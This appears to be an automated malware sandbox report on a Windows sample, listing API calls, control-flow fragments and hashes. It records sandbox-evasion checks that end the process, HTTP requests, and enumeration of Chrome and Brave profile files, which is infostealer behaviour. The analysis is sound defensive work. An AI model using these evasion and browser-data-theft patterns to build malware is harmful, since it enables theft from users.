                                      • Instruction Fuzzy Hash: F5527774A00229DFDB64CF68C984BA8BBB1BF49304F1480D9E94DAB251DB71AEC5DF14

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009A9C50), ref: 004198A1
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009A9B48), ref: 004198BA
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009A9B90), ref: 004198D2
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009A9BA8), ref: 004198EA
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009A9CE0), ref: 00419903
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009A9600), ref: 0041991B
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009A3CD8), ref: 00419933
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009A3DB8), ref: 0041994C
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009A9BF0), ref: 00419964
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009A9C68), ref: 0041997C
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009D3880), ref: 00419995
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009D3808), ref: 004199AD
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009A3C98), ref: 004199C5
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,009D38C8), ref: 004199DE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                        • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                        • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                        • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                        • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                        • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                        • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                        • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                        • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                      • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                        • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                        • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                        • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                        • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                        • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                        • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                        • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009A94C0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                      • Sleep.KERNEL32(00001770), ref: 00416B04
                                      • CloseHandle.KERNEL32(?,00000000,?,009A94C0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                      • ExitProcess.KERNEL32 ref: 00416B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 3511611419-0
                                      • Opcode ID: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                      • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                      • Opcode Fuzzy Hash: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                      • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                      Control-flow Graph

                                      APIs
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??2@$CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1683549937-4251816714
                                      • Opcode ID: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                      • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                      • Opcode Fuzzy Hash: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                      • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1500 401287 1499->1500 1501 40129a-40129d 1499->1501 1503 401292-401294 ExitProcess 1500->1503 1504 401289-401290 1500->1504 1504->1501 1504->1503
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                      • __aulldiv.LIBCMT ref: 00401258
                                      • __aulldiv.LIBCMT ref: 00401266
                                      • ExitProcess.KERNEL32 ref: 00401294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                      • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1516 416af5-416b04 CloseHandle Sleep 1510->1516 1517 416ad9-416af1 call 41aad0 CreateEventA 1510->1517 1516->1508 1517->1511
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009A94C0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                      • Sleep.KERNEL32(00001770), ref: 00416B04
                                      • CloseHandle.KERNEL32(?,00000000,?,009A94C0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                      • ExitProcess.KERNEL32 ref: 00416B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                      • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                      • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                      • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                        • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,009DC7A8), ref: 00406303
                                        • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                        • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,009DC178,00000000,00000000,00400100,00000000), ref: 00406385
                                        • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                        • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                      • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                      • Opcode Fuzzy Hash: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                      • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocComputerNameProcess
                                      • String ID:
                                      • API String ID: 4203777966-0
                                      • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                      • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                      • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                      • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                      • ExitProcess.KERNEL32 ref: 00401143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                      • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                      • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                      • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009AB206
                                      • Module32First.KERNEL32(00000000,00000224), ref: 009AB226
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904673836.00000000009AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 009AA000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_9aa000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3833638111-0
                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction ID: 9fcc50dc97b449eca1061ddb6981a535cd65f31035a2b78606d8da42750e9a25
                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                      • Instruction Fuzzy Hash: E0F096311007116BEB203BF5AC8DF6EB6ECAF5A724F10052AEA63D10C1DB70EC458AA1
                                      APIs
                                      • SetErrorMode.KERNEL32(00000400,?,?,00910223,?,?), ref: 00910E19
                                      • SetErrorMode.KERNEL32(00000000,?,?,00910223,?,?), ref: 00910E1E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction ID: 528652e3d4e3a6591c226d85775ae6f7522507528a320a02b3051d7adb2ecc2a
                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                      • Instruction Fuzzy Hash: FBD0123124512C77DB002A95DC09BCD7B1CDF05B62F008411FB0DD9080C7B1998046E5
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                      • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                      • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                      • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                      APIs
                                        • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                        • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                        • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                        • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                        • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                        • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                      • ExitProcess.KERNEL32 ref: 004011C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 1004333139-0
                                      • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                      • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                      • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                      • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009AAEEE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904673836.00000000009AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 009AA000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_9aa000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction ID: 1eb3e1475b612ad3c3f17a031b9d5a97efb8b59db8ae1e9515e438561a027a64
                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                      • Instruction Fuzzy Hash: 1C112B79A00208EFDB01DF98C989E98BBF5AF08350F058094F9489B362D371EA50DB80
                                      APIs
                                      • wsprintfA.USER32 ref: 004138CC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                      • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                      • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                      • API String ID: 1125553467-817767981
                                      • Opcode ID: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                      • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                      • Opcode Fuzzy Hash: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                      • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                      • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                      • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                      • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-726946144
                                      • Opcode ID: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
                                      • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                      • Opcode Fuzzy Hash: ad623e4dddf2acf3531251e10fe9148c0028cfef02df62942197d5aa38f2a08f
